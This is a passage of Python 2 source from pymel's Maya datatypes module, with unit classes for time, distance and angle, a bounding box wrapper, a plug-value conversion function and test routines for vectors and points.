elif isinstance(value, cls):\n value = value.asUnit(unit)\n #data = cls.apicls(value, unit)\n # the float representation uses internal units so that arithmetics work\n #newobj = float.__new__(cls, data.asUnit(cls.apicls.internalUnit()))\n #newobj = float.__new__(cls, data.asUnit(unit))\n newobj = float.__new__(cls, value)\n #ewobj._data = data\n newobj._unit = unit\n newobj._data = cls.apicls(value, unit)\n return newobj\n\n def assign(self, *args):\n if isinstance(args, self.__class__):\n args = (args._data, args._unit)\n self._data.assign(*args)\n\n def __repr__(self):\n return 'dt.%s(%s, unit=%r)' % (self.__class__.__name__, self, self.unit)\n\n def asUnit(self, unit):\n return self._data.asUnits(self.__class__.kUnit(unit))\n\n# def asUnit(self) :\n# return self.asUnit(self.unit)\n\n def asUIUnit(self):\n return self.asUnit(self.__class__.getUIUnit())\n\n def asInternalUnit(self):\n return self.asUnit(self.__class__.getInternalUnit())\n\nclass Time(Unit):\n apicls = _api.MTime\n Unit = _factories.apiClassInfo['MTime']['pymelEnums']['Unit']\n\n @classmethod\n def _inCast(cls, x):\n return cls(x)._data\n\n\nclass Distance(Unit):\n\n \"\"\"\n >>> from pymel.core import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> dt.Distance.getInternalUnit()\n 'centimeters'\n >>> dt.Distance.setUIUnit('meters')\n >>> dt.Distance.getUIUnit()\n 'meters'\n\n >>> d = dt.Distance(12)\n >>> d.unit\n 'meters'\n >>> print d\n 12.0\n >>> print repr(d)\n dt.Distance(12.0, unit='meters')\n >>> print d.asUIUnit()\n 12.0\n >>> print d.asInternalUnit()\n 1200.0\n\n >>> dt.Distance.setUIUnit('centimeters')\n >>> dt.Distance.getUIUnit()\n 'centimeters'\n >>> e = dt.Distance(12)\n >>> e.unit\n 'centimeters'\n >>> print e\n 12.0\n >>> str(e)\n '12.0'\n >>> print repr(e)\n dt.Distance(12.0, unit='centimeters')\n >>> print e.asUIUnit()\n 12.0\n >>> print e.asInternalUnit()\n 12.0\n\n >>> f = dt.Distance(12, 'feet')\n >>> print f\n 12.0\n >>> print repr(f)\n dt.Distance(12.0, unit='feet')\n >>> f.unit\n 'feet'\n >>> print f.asUIUnit()\n 365.76\n >>> dt.Distance.setUIUnit('meters')\n >>> dt.Distance.getUIUnit()\n 'meters'\n >>> print f.asUIUnit()\n 3.6576\n >>> dt.Distance.getInternalUnit()\n 'centimeters'\n >>> print f.asInternalUnit()\n 365.76\n\n >>> print f.asFeet()\n 12.0\n >>> print f.asMeters()\n 3.6576\n >>> print f.asCentimeters()\n 365.76\n\n >>> dt.Distance.setUIUnit()\n >>> dt.Distance.getUIUnit()\n 'centimeters'\n \"\"\"\n apicls = _api.MDistance\n Unit = _factories.apiClassInfo['MDistance']['pymelEnums']['Unit']\n\n def asMillimeter(self):\n return self.asUnit('millimeter')\n\n def asCentimeters(self):\n return self.asUnit('centimeters')\n\n def asKilometers(self):\n return self.asUnit('kilometers')\n\n def asMeters(self):\n return self.asUnit('meters')\n\n def asInches(self):\n return self.asUnit('inches')\n\n def asFeet(self):\n return self.asUnit('feet')\n\n def asYards(self):\n return self.asUnit('yards')\n\n def asMiles(self):\n return self.asUnit('miles')\n\n @classmethod\n def _outCast(cls, instance, result):\n return cls(result, 'centimeters').asUIUnit()\n\n\nclass Angle(Unit):\n apicls = _api.MAngle\n Unit = _factories.apiClassInfo['MAngle']['pymelEnums']['Unit']\n\n def asRadians(self):\n return self.asUnit('radians')\n\n def asDegrees(self):\n return self.asUnit('degrees')\n\n def asAngMinutes(self):\n return self.asUnit('angMinutes')\n\n def asAngSeconds(self):\n return self.asUnit('angSeconds')\n\n @classmethod\n def _outCast(cls, instance, result):\n return cls(result, 
'radians').asUIUnit()\n\n\nclass BoundingBox(_api.MBoundingBox):\n apicls = _api.MBoundingBox\n __metaclass__ = _factories.MetaMayaTypeWrapper\n\n def __init__(self, *args):\n if len(args) == 2:\n args = list(args)\n if not isinstance(args[0], _api.MPoint):\n args[0] = Point(args[0])\n if not isinstance(args[1], _api.MPoint):\n args[1] = Point(args[1])\n _api.MBoundingBox.__init__(self, *args)\n\n def __str__(self):\n return 'dt.%s(%s,%s)' % (self.__class__.__name__, self.min(), self.max())\n\n def __repr__(self):\n return str(self)\n\n def __getitem__(self, item):\n if item == 0:\n return self.min()\n elif item == 1:\n return self.max()\n raise IndexError, \"Index out of range\"\n\n def __melobject__(self):\n \"\"\"A flat list of 6 values [minx, miny, minz, maxx, maxy, maxz]\"\"\"\n return list(self.min()) + list(self.max())\n\n repr = __str__\n w = property(_factories.wrapApiMethod(_api.MBoundingBox, 'width'))\n h = property(_factories.wrapApiMethod(_api.MBoundingBox, 'height'))\n d = property(_factories.wrapApiMethod(_api.MBoundingBox, 'depth'))\n\n#_factories.ApiTypeRegister.register( 'MVector', Vector )\n#_factories.ApiTypeRegister.register( 'MMatrix', Matrix )\n#_factories.ApiTypeRegister.register( 'MPoint', Point )\n#_factories.ApiTypeRegister.register( 'MColor', Color )\n#_factories.ApiTypeRegister.register( 'MQuaternion', Quaternion )\n#_factories.ApiTypeRegister.register( 'MEulerRotation', EulerRotation )\n_factories.ApiTypeRegister.register('MTime', Time, inCast=Time._inCast)\n_factories.ApiTypeRegister.register('MDistance', Distance, outCast=Distance._outCast)\n_factories.ApiTypeRegister.register('MAngle', Angle, outCast=Angle._outCast)\n\n\n#_floatUpConvertDict = {_api.MFloatArray:_api.MDoubleArray,\n# _api.MFloatMatrix:_api.MMatrix,\n# _api.MFloatPoint:_api.MPoint,\n# _api.MFloatPointArray:_api.MPointArray,\n# _api.MFloatVector:_api.MVector,\n# _api.MFloatVectorArray:_api.MVectorArray,\n# FloatMatrix:Matrix,\n# FloatPoint:Point,\n# FloatVector:Vector\n# }\n# def _floatUpConvert(input):\n# \"\"\"Will convert various Float* objects to their corresponding double object\n#\n# ie, api.MFloatMatrix => api.MMatrix, FloatPoint => Point\n# \"\"\"\n# newClass = _floatUpConvertDict.get(input.__class__)\n# if newClass:\n# return newClass(input)\n# else:\n# return input\n\ndef getPlugValue(plug):\n \"\"\"given an MPlug, get its value as a pymel-style object\"\"\"\n\n # if plug.isArray():\n # raise TypeError, \"array plugs of this type are not supported\"\n\n obj = plug.attribute()\n apiType = obj.apiType()\n\n # Float Pairs\n if apiType in [_api.MFn.kAttribute2Double, _api.MFn.kAttribute2Float]:\n res = []\n for i in range(plug.numChildren()):\n res.append(getPlugValue(plug.child(i)))\n if isinstance(res[0], Distance):\n return Vector(res)\n return res\n\n # Integer Groups\n elif apiType in [_api.MFn.kAttribute2Short, _api.MFn.kAttribute2Int, _api.MFn.kAttribute3Short, _api.MFn.kAttribute3Int]:\n res = []\n for i in range(plug.numChildren()):\n res.append(getPlugValue(plug.child(i)))\n return res\n\n # Float Groups\n elif apiType in [_api.MFn.kAttribute3Double, _api.MFn.kAttribute3Float, _api.MFn.kAttribute4Double]:\n res = []\n for i in range(plug.numChildren()):\n res.append(getPlugValue(plug.child(i)))\n\n if isinstance(res[0], Distance):\n return Vector(res)\n elif _api.MFnAttribute(obj).isUsedAsColor():\n return Color(res)\n return res\n\n # Compound\n elif apiType in [_api.MFn.kCompoundAttribute]:\n res = []\n for i in range(plug.numChildren()):\n 
res.append(getPlugValue(plug.child(i)))\n return tuple(res)\n\n # Distance\n elif apiType in [_api.MFn.kDoubleLinearAttribute, _api.MFn.kFloatLinearAttribute]:\n val = plug.asMDistance()\n unit = _api.MDistance.uiUnit()\n # as becomes a keyword in python 2.6\n return Distance(val.asUnits(unit), unit)\n\n # Angle\n elif apiType in [_api.MFn.kDoubleAngleAttribute, _api.MFn.kFloatAngleAttribute]:\n val = plug.asMAngle()\n unit = _api.MAngle.uiUnit()\n # as becomes a keyword in python 2.6\n return Angle(val.asUnits(unit), unit)\n\n # Time\n elif apiType == _api.MFn.kTimeAttribute:\n val = plug.asMTime()\n unit = _api.MTime.uiUnit()\n # as becomes a keyword in python 2.6\n return Time(val.asUnits(unit), unit)\n\n elif apiType == _api.MFn.kNumericAttribute:\n nAttr = _api.MFnNumericAttribute(obj)\n dataType = nAttr.unitType()\n if dataType == _api.MFnNumericData.kBoolean:\n return plug.asBool()\n\n elif dataType in [_api.MFnNumericData.kShort, _api.MFnNumericData.kInt, _api.MFnNumericData.kLong, _api.MFnNumericData.kByte]:\n return plug.asInt()\n\n elif dataType in [_api.MFnNumericData.kFloat, _api.MFnNumericData.kDouble, _api.MFnNumericData.kAddr]:\n return plug.asDouble()\n raise \"%s: unknown numeric attribute type: %s\" % (plug.partialName(True, True, True, False, True, True), dataType)\n\n elif apiType == _api.MFn.kEnumAttribute:\n # TODO : use EnumValue class?\n return plug.asInt()\n\n elif apiType == _api.MFn.kTypedAttribute:\n tAttr = _api.MFnTypedAttribute(obj)\n dataType = tAttr.attrType()\n\n if dataType == _api.MFnData.kInvalid: # 0\n return None\n\n elif dataType == _api.MFnData.kNumeric: # 1\n\n # all of the dynamic mental ray attributes fail here, but i have no idea why they are numeric attrs and not message attrs.\n # cmds.getAttr returns None, so we will too.\n try:\n dataObj = plug.asMObject()\n except:\n return\n\n try:\n numFn = _api.MFnNumericData(dataObj)\n except RuntimeError:\n if plug.isArray():\n raise TypeError, \"%s: numeric arrays are not supported\" % plug.partialName(True, True, True, False, True, True)\n else:\n raise TypeError, \"%s: attribute type is numeric, but its data cannot be interpreted numerically\" % plug.partialName(True, True, True, False, True, True)\n dataType = numFn.numericType()\n\n if dataType == _api.MFnNumericData.kBoolean:\n return plug.asBool()\n\n elif dataType in [_api.MFnNumericData.kShort, _api.MFnNumericData.kInt, _api.MFnNumericData.kLong, _api.MFnNumericData.kByte]:\n return plug.asInt()\n\n elif dataType in [_api.MFnNumericData.kFloat, _api.MFnNumericData.kDouble, _api.MFnNumericData.kAddr]:\n return plug.asDouble()\n\n elif dataType == _api.MFnNumericData.k2Short:\n ptr1 = _api.SafeApiPtr('short')\n ptr2 = _api.SafeApiPtr('short')\n\n numFn.getData2Short(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType in [_api.MFnNumericData.k2Int, _api.MFnNumericData.k2Long]:\n ptr1 = _api.SafeApiPtr('int')\n ptr2 = _api.SafeApiPtr('int')\n\n numFn.getData2Int(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType == _api.MFnNumericData.k2Float:\n ptr1 = _api.SafeApiPtr('float')\n ptr2 = _api.SafeApiPtr('float')\n\n numFn.getData2Float(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType == _api.MFnNumericData.k2Double:\n ptr1 = _api.SafeApiPtr('double')\n ptr2 = _api.SafeApiPtr('double')\n\n numFn.getData2Double(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType == _api.MFnNumericData.k3Float:\n ptr1 = _api.SafeApiPtr('float')\n ptr2 = _api.SafeApiPtr('float')\n ptr3 = 
_api.SafeApiPtr('float')\n\n numFn.getData3Float(ptr1(), ptr2(), ptr3())\n return (ptr1.get(), ptr2.get(), ptr3.get())\n\n elif dataType == _api.MFnNumericData.k3Double:\n ptr1 = _api.SafeApiPtr('double')\n ptr2 = _api.SafeApiPtr('double')\n ptr3 = _api.SafeApiPtr('double')\n\n numFn.getData3Double(ptr1(), ptr2(), ptr3())\n return (ptr1.get(), ptr2.get(), ptr3.get())\n\n elif dataType == _api.MFnNumericData.kChar:\n return plug.asChar()\n\n raise TypeError, \"%s: Unsupported numeric attribute: %s\" % (plug.partialName(True, True, True, False, True, True), dataType)\n\n elif dataType == _api.MFnData.kString: # 4\n return plug.asString()\n\n elif dataType == _api.MFnData.kMatrix: # 5\n return Matrix(_api.MFnMatrixData(plug.asMObject()).matrix())\n\n elif dataType == _api.MFnData.kStringArray: # 6\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnStringArrayData(dataObj).array()\n return [array[i] for i in range(array.length())]\n\n elif dataType == _api.MFnData.kDoubleArray: # 7\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnDoubleArrayData(dataObj).array()\n return [array[i] for i in range(array.length())]\n\n elif dataType == _api.MFnData.kIntArray: # 8\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnIntArrayData(dataObj).array()\n return [array[i] for i in range(array.length())]\n\n elif dataType == _api.MFnData.kPointArray: # 9\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnPointArrayData(dataObj).array()\n return [Point(array[i]) for i in range(array.length())]\n\n elif dataType == _api.MFnData.kVectorArray: # 10\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnVectorArrayData(dataObj).array()\n return [Vector(array[i]) for i in range(array.length())]\n\n # this block crashes maya under certain circumstances\n# elif dataType == _api.MFnData.kComponentList : # 11\n# try:\n# dataObj = plug.asMObject()\n# except RuntimeError:\n# return []\n# array = _api.MFnComponentListData( dataObj )\n# return array\n# #return [ Vector(array[i]) for i in range(array.length()) ]\n\n raise TypeError, \"%s: Unsupported typed attribute: %s\" % (plug.partialName(True, True, True, False, True, True), dataType)\n\n raise TypeError, \"%s: Unsupported Type: %s\" % (plug.partialName(True, True, True, False, True, True), _factories.apiEnumsToApiTypes.get(apiType, apiType))\n\ndef _testMVector():\n\n print \"Vector class:\", dir(Vector)\n u = Vector()\n print u\n print \"Vector instance:\", dir(u)\n print repr(u)\n print Vector.__readonly__\n print Vector.__slots__\n print Vector.shape\n print Vector.ndim\n print Vector.size\n print u.shape\n print u.ndim\n print u.size\n # should fail\n u.shape = 2\n\n u.assign(Vector(4, 5, 6))\n print repr(u)\n #Vector([4.0, 5.0, 6.0])\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print len(u)\n # 3\n # inherits from VectorN --> Array\n print isinstance(u, VectorN)\n # True\n print isinstance(u, Array)\n # True\n # as well as _api.Vector\n print isinstance(u, _api.MVector)\n # True\n # accepted directly by API methods\n M = _api.MTransformationMatrix()\n M.setTranslation(u, _api.MSpace.kWorld)\n # need conversion on the way back though\n u = Vector(M.getTranslation(_api.MSpace.kWorld))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n\n u = Vector(x=1, y=2, z=3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n u = Vector([1, 2], z=3)\n print repr(u)\n # Vector([1.0, 
2.0, 3.0])\n u = Vector(_api.MPoint(1, 2, 3))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print \"u = Vector(VectorN(1, 2, 3))\"\n u = Vector(VectorN(1, 2, 3))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n u = Vector(1)\n print repr(u)\n # Vector([1.0, 1.0, 1.0])\n u = Vector(1, 2)\n print repr(u)\n # Vector([1.0, 2.0, 0.0])\n u = Vector(VectorN(1, shape=(2,)))\n print repr(u)\n # Vector([1.0, 1.0, 0.0])\n u = Vector(Point(1, 2, 3))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n u = Vector(Point(1, 2, 3, 1), y=20, z=30)\n print repr(u)\n # Vector([1.0, 20.0, 30.0])\n # should fail\n print \"Vector(VectorN(1, 2, 3, 4))\"\n try:\n u = Vector(VectorN(1, 2, 3, 4))\n except:\n print \"will raise ValueError: could not cast [1, 2, 3, 4] to Vector of size 3, some data would be lost\"\n\n print u.get()\n # (1.0, 20.0, 30.0)\n print u[0]\n 1.0\n u[0] = 10\n print repr(u)\n # Vector([10.0, 20.0, 30.0])\n print (10 in u)\n # True\n print list(u)\n # [10.0, 20.0, 30.0]\n\n u = Vector.xAxis\n v = Vector.yAxis\n print Vector.xAxis\n print str(Vector.xAxis)\n print unicode(Vector.xAxis)\n print repr(Vector.xAxis)\n\n print \"u = Vector.xAxis:\"\n print repr(u)\n # Vector([1.0, 0.0, 0.0])\n print \"v = Vector.yAxis:\"\n print repr(v)\n # Vector([0.0, 1.0, 0.0])\n n = u ^ v\n print \"n = u ^ v:\"\n print repr(n)\n # Vector([0.0, 0.0, 1.0])\n print \"n.x=%s, n.y=%s, n.z=%s\" % (n.x, n.y, n.z)\n # n.x=0.0, n.y=0.0, n.z=1.0\n n = u ^ VectorN(v)\n print \"n = u ^ VectorN(v):\"\n print repr(n)\n # Vector([0.0, 0.0, 1.0])\n n = u ^ [0, 1, 0]\n print \"n = u ^ [0, 1, 0]:\"\n print repr(n)\n # Vector([0.0, 0.0, 1.0])\n n[0:2] = [1, 1]\n print \"n[0:2] = [1, 1]:\"\n print repr(n)\n # Vector([1.0, 1.0, 1.0])\n print \"n = n * 2 :\"\n n = n * 2\n print repr(n)\n # Vector([2.0, 2.0, 2.0])\n print \"n = n * [0.5, 1.0, 2.0]:\"\n n = n * [0.5, 1.0, 2.0]\n print repr(n)\n # Vector([1.0, 2.0, 4.0])\n print \"n * n :\"\n print n * n\n # 21.0\n print repr(n.clamp(1.0, 2.0))\n # Vector([1.0, 2.0, 2.0])\n print repr(-n)\n # Vector([-1.0, -2.0, -4.0])\n w = u + v\n print repr(w)\n # Vector([1.0, 1.0, 0.0])\n p = Point(1, 2, 3)\n q = u + p\n print repr(q)\n # Point([2.0, 2.0, 3.0, 1.0])\n q = p + u\n print repr(q)\n # Point([2.0, 2.0, 3.0, 1.0])\n print repr(p + q)\n # Point([3.0, 4.0, 6.0, 1.0])\n w = u + VectorN(1, 2, 3, 4)\n print repr(w)\n # VectorN([2.0, 2.0, 3.0, 4])\n print repr(u + 2)\n # Vector([3.0, 2.0, 2.0])\n print repr(2 + u)\n # Vector([3.0, 2.0, 2.0])\n print repr(p + 2)\n # Point([3.0, 4.0, 5.0, 1.0])\n print repr(2 + p)\n # Point([3.0, 4.0, 5.0, 1.0])\n print repr(p + u)\n # Point([2.0, 2.0, 3.0, 1.0])\n print repr(VectorN(1, 2, 3, 4) + u)\n # VectorN([2.0, 2.0, 3.0, 4])\n print repr([1, 2, 3] + u)\n # Vector([2.0, 2.0, 3.0])\n\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print u.length()\n # 3.74165738677\n print length(u)\n # 3.74165738677\n print length([1, 2, 3])\n # 3.74165738677\n print length(VectorN(1, 2, 3))\n # 3.74165738677\n print VectorN(1, 2, 3).length()\n # 3.74165738677\n print length(VectorN(1, 2, 3, 4))\n # 5.47722557505\n print VectorN(1, 2, 3, 4).length()\n # 5.47722557505\n print length(1)\n # 1.0\n print length([1, 2])\n # 2.2360679775\n print length([1, 2, 3])\n # 3.74165738677\n print length([1, 2, 3, 4])\n # 5.47722557505\n print length([1, 2, 3, 4], 0)\n # 5.47722557505\n print length([1, 2, 3, 4], (0,))\n # 5.47722557505\n print length([[1, 2], [3, 4]], 1)\n # [3.16227766017, 4.472135955]\n # should fail\n try:\n print length([1, 2, 3, 4], 1)\n except:\n print 
\"Will raise ValueError, \\\"axis 0 is the only valid axis for a Vector, 1 invalid\\\"\"\n\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print u.sqlength()\n # 14\n print repr(u.normal())\n # Vector([0.267261241912, 0.534522483825, 0.801783725737])\n u.normalize()\n print repr(u)\n # Vector([0.267261241912, 0.534522483825, 0.801783725737])\n\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n w = u + [0.01, 0.01, 0.01]\n print repr(w)\n # Vector([1.01, 2.01, 3.01])\n print (u == u)\n # True\n print (u == w)\n # False\n print (u == Vector(1.0, 2.0, 3.0))\n # True\n print (u == [1.0, 2.0, 3.0])\n # False\n print (u == Point(1.0, 2.0, 3.0))\n # False\n print u.isEquivalent([1.0, 2.0, 3.0])\n # True\n print u.isEquivalent(Vector(1.0, 2.0, 3.0))\n # True\n print u.isEquivalent(Point(1.0, 2.0, 3.0))\n # True\n print u.isEquivalent(w)\n # False\n print u.isEquivalent(w, 0.1)\n # True\n\n u = Vector(1, 0, 0)\n print repr(u)\n # Vector([1.0, 0.0, 0.0])\n v = Vector(0.707, 0, -0.707)\n print repr(v)\n # Vector([0.707, 0.0, -0.707])\n print repr(axis(u, v))\n # Vector([-0.0, 0.707, 0.0])\n print repr(u.axis(v))\n # Vector([-0.0, 0.707, 0.0])\n print repr(axis(VectorN(u), VectorN(v)))\n # VectorN([-0.0, 0.707, 0.0])\n print repr(axis(u, v, normalize=True))\n # Vector([-0.0, 1.0, 0.0])\n print repr(v.axis(u, normalize=True))\n # Vector([-0.0, -1.0, 0.0])\n print repr(axis(VectorN(u), VectorN(v), normalize=True))\n # VectorN([-0.0, 1.0, 0.0])\n print angle(u, v)\n # 0.785398163397\n print v.angle(u)\n # 0.785398163397\n print angle(VectorN(u), VectorN(v))\n # 0.785398163397\n print cotan(u, v)\n # 1.0\n print repr(u.rotateTo(v))\n # Quaternion([-0.0, 0.382683432365, 0.0, 0.923879532511])\n print repr(u.rotateBy(u.axis(v), u.angle(v)))\n # Vector([0.707106781187, 0.0, -0.707106781187])\n q = Quaternion([-0.0, 0.382683432365, 0.0, 0.923879532511])\n print repr(u.rotateBy(q))\n # Vector([0.707106781187, 0.0, -0.707106781187])\n print u.distanceTo(v)\n # 0.765309087885\n print u.isParallel(v)\n # False\n print u.isParallel(2 * u)\n # True\n print repr(u.blend(v))\n # Vector([0.8535, 0.0, -0.3535])\n\n print \"end tests Vector\"\n\ndef _testMPoint():\n\n print \"Point class\", dir(Point)\n print hasattr(Point, 'data')\n p = Point()\n print repr(p)\n # Point([0.0, 0.0, 0.0])\n print \"Point instance\", dir(p)\n print hasattr(p, 'data')\n print repr(p.data)\n # >\n\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n v = Vector(p)\n print repr(v)\n # Vector([1.0, 2.0, 3.0])\n V = VectorN(p)\n print repr(V)\n # VectorN([1.0, 2.0, 3.0, 1.0])\n print list(p)\n # [1.0, 2.0, 3.0]\n print len(p)\n # 3\n print p.size\n # 4\n print p.x, p.y, p.z, p.w\n # 1.0 2.0 3.0 1.0\n print p[0], p[1], p[2], p[3]\n # 1.0 2.0 3.0 1.0\n p.get()\n # 1.0 2.0 3.0 1.0\n\n # accepted by api\n q = _api.MPoint()\n print q.distanceTo(p)\n # 3.74165738677\n\n # support for non cartesian points still there\n\n p = Point(1, 2, 3, 2)\n print repr(p)\n # Point([1.0, 2.0, 3.0, 2.0])\n v = Vector(p)\n print repr(v)\n # Vector([0.5, 1.0, 1.5])\n V = VectorN(p)\n print repr(V)\n # VectorN([1.0, 2.0, 3.0, 2.0])\n print list(p)\n # [1.0, 2.0, 3.0, 2.0]\n print len(p)\n # 4\n print p.size\n # 4\n print p.x, p.y, p.z, p.w\n # 1.0 2.0 3.0 2.0\n print p[0], p[1], p[2], p[3]\n # 1.0 2.0 3.0 2.0\n p.get()\n # 1.0 2.0 3.0 2.0\n\n # accepted by api\n q = _api.MPoint()\n print q.distanceTo(p)\n # 1.87082869339\n\n p = Point(_api.MPoint())\n print repr(p)\n # Point([0.0, 0.0, 0.0])\n p = Point(1)\n print 
repr(p)\n # Point([1.0, 1.0, 1.0])\n p = Point(1, 2)\n print repr(p)\n # Point([1.0, 2.0, 0.0])\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(_api.MPoint(1, 2, 3))\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(VectorN(1, 2))\n print repr(p)\n # Point([1.0, 2.0, 0.0])\n p = Point(Vector(1, 2, 3))\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(_api.MVector(1, 2, 3))\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(VectorN(1, 2, 3, 4))\n print repr(p)\n # Point([1.0, 2.0, 3.0, 4.0])\n print repr(Vector(p))\n # Vector([0.25, 0.5, 0.75])\n print repr(VectorN(p))\n # VectorN([1.0, 2.0, 3.0, 4.0])\n p = Point(p, w=1)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print repr(Vector(p))\n # Vector([1.0, 2.0, 3.0])\n print repr(VectorN(p))\n # VectorN([1.0, 2.0, 3.0, 1.0])\n\n p = Point.origin\n print repr(p)\n # Point([0.0, 0.0, 0.0])\n p = Point.xAxis\n print repr(p)\n # Point([1.0, 0.0, 0.0])\n\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print repr(p + Vector([1, 2, 3]))\n # Point([2.0, 4.0, 6.0])\n print repr(p + Point([1, 2, 3]))\n # Point([2.0, 4.0, 6.0])\n print repr(p + [1, 2, 3])\n # Point([2.0, 4.0, 6.0])\n print repr(p + [1, 2, 3, 1])\n # Point([2.0, 4.0, 6.0])\n print repr(p + Point([1, 2, 3, 1]))\n # Point([2.0, 4.0, 6.0])\n print repr(p + [1, 2, 3, 2])\n # Point([2.0, 4.0, 6.0, 3.0]) TODO : convert to Point always?\n print repr(p + Point([1, 2, 3, 2]))\n # Point([1.5, 3.0, 4.5])\n\n print repr(Vector([1, 2, 3]) + p)\n # Point([2.0, 4.0, 6.0])\n print repr(Point([1, 2, 3]) + p)\n # Point([2.0, 4.0, 6.0])\n print repr([1, 2, 3] + p)\n # Point([2.0, 4.0, 6.0])\n print repr([1, 2, 3, 1] + p)\n # Point([2.0, 4.0, 6.0])\n print repr(Point([1, 2, 3, 1]) + p)\n # Point([2.0, 4.0, 6.0])\n print repr([1, 2, 3, 2] + p)\n # Point([2.0, 4.0, 6.0, 3.0])\n print repr(Point([1, 2, 3, 2]) + p)\n # Point([1.5, 3.0, 4.5])\n\n # various operation, on cartesian and non cartesian points\n\n print \"p = Point(1, 2, 3)\"\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print \"p/2\"\n print repr(p / 2)\n # Point([0.5, 1.0, 1.5])\n print \"p*2\"\n print repr(p * 2)\n # Point([2.0, 4.0, 6.0])\n print \"q = Point(0.25, 0.5, 1.0)\"\n q = Point(0.25, 0.5, 1.0)\n print repr(q)\n # Point([0.25, 0.5, 1.0])\n print repr(q + 2)\n # Point([2.25, 2.5, 3.0])\n print repr(q / 2)\n # Point([0.125, 0.25, 0.5])\n print repr(p + q)\n # Point([1.25, 2.5, 4.0])\n print repr(p - q)\n # Vector([0.75, 1.5, 2.0])\n print repr(q - p)\n # Vector([-0.75, -1.5, -2.0])\n print repr(p - (p - q))\n # Point([0.25, 0.5, 1.0])\n print repr(Vector(p) * Vector(q))\n # 4.25\n print repr(p * q)\n # 4.25\n print repr(p / q)\n # Point([4.0, 4.0, 3.0])\n\n print \"p = Point(1, 2, 3)\"\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print \"p/2\"\n print repr(p / 2)\n # Point([0.5, 1.0, 1.5])\n print \"p*2\"\n print repr(p * 2)\n # Point([2.0, 4.0, 6.0])\n print \"q = Point(0.25, 0.5, 1.0, 0.5)\"\n q = Point(0.25, 0.5, 1.0, 0.5)\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n r = q.deepcopy()\n print repr(r)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(r.cartesianize())\n # Point([0.5, 1.0, 2.0])\n print repr(r)\n # Point([0.5, 1.0, 2.0])\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(q.cartesian())\n # Point([0.5, 1.0, 2.0])\n r = q.deepcopy()\n print repr(r)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(r.rationalize())\n # Point([0.5, 1.0, 2.0, 0.5])\n print repr(r)\n # Point([0.5, 1.0, 2.0, 0.5])\n print 
repr(q.rational())\n # Point([0.5, 1.0, 2.0, 0.5])\n r = q.deepcopy()\n print repr(r.homogenize())\n # Point([0.125, 0.25, 0.5, 0.5])\n print repr(r)\n # Point([0.125, 0.25, 0.5, 0.5])\n print repr(q.homogen())\n # Point([0.125, 0.25, 0.5, 0.5])\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n print Vector(q)\n # [0.5, 1.0, 2.0]\n print Vector(q.cartesian())\n # [0.5, 1.0, 2.0]\n # ignore w\n print \"q/2\"\n print repr(q / 2)\n # Point([0.125, 0.25, 0.5, 0.5])\n print \"q*2\"\n print repr(q * 2)\n # Point([0.5, 1.0, 2.0, 0.5])\n print repr(q + 2) # cartesianize is done by Vector add\n # Point([2.5, 3.0, 4.0])\n\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(p + Vector(1, 2, 3))\n # Point([2.0, 4.0, 6.0])\n print repr(q + Vector(1, 2, 3))\n # Point([1.5, 3.0, 5.0])\n print repr(q.cartesian() + Vector(1, 2, 3))\n # Point([1.5, 3.0, 5.0])\n\n print repr(p - q)\n # Vector([0.5, 1.0, 1.0])\n print repr(p - q.cartesian())\n # Vector([0.5, 1.0, 1.0])\n print repr(q - p)\n # Vector([-0.5, -1.0, -1.0])\n print repr(p - (p - q))\n # Point([0.5, 1.0, 2.0])\n print repr(Vector(p) * Vector(q))\n # 4.25\n print repr(p * q)\n # 4.25\n print repr(p / q) # need explicit homogenize as division not handled by api\n # Point([4.0, 4.0, 3.0, 2.0]) TODO : what do we want here ?\n # Vector([2.0, 2.0, 1.5])\n # additionnal methods\n\n print \"p = Point(x=1, y=2, z=3)\"\n p = Point(x=1, y=2, z=3)\n print p.length()\n # 3.74165738677\n print p[:1].length()\n # 1.0\n print p[:2].length()\n # 2.2360679775\n print p[:3].length()\n # 3.74165738677\n\n p = Point(1.0, 0.0, 0.0)\n q = Point(0.707, 0.0, -0.707)\n print repr(p)\n # Point([1.0, 0.0, 0.0, 1.0])\n print repr(q)\n # Point([0.707, 0.0, -0.707, 1.0])\n print repr(q - p)\n # Vector([-0.293, 0.0, -0.707])\n print 